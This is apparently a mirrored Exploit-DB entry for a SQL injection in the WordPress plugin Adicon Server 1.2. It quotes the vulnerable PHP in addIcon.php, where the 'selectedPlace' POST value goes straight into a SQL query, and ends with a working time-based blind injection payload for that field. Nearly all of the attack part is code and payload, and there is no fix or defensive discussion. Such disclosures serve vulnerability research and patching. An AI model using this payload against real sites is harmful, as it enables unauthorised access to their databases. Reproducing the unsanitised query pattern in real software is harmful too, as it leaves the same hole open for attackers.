WordPress Plugin Adicon Server 1.2 – ‘selectedPlace’ SQL Injection

  • 作者: Kaimi
    日期: 2019-01-02
  • 类别:
    平台:
  • 来源:https://www.exploit-db.com/exploits/46066/
  • # Exploit Title: WordPress Plugin Adicon Server 1.2 - 'selectedPlace' SQL Injection
    # Date: 2018-12-28
    # Software Link: https://wordpress.org/plugins/adicons/
    # Exploit Author: Kaimi
    # Website: https://kaimi.io
    # Version: 1.2
    # Category: webapps
    
    # SQL Injection
    # File: addIcon.php
    # Vulnerable code:
    # $placement=$_POST['selectedPlace'];
    
    # $x=explode("_",$placement);
    # $ck=$wpdb->get_row("select id from ".$table_prefix."adicons where adRow=".$x[0]." and adCol=".$x[1]);
    
    # Example payload:
    selectedPlace=1 AND (SELECT * FROM (SELECT(SLEEP(1)))abcD); -- -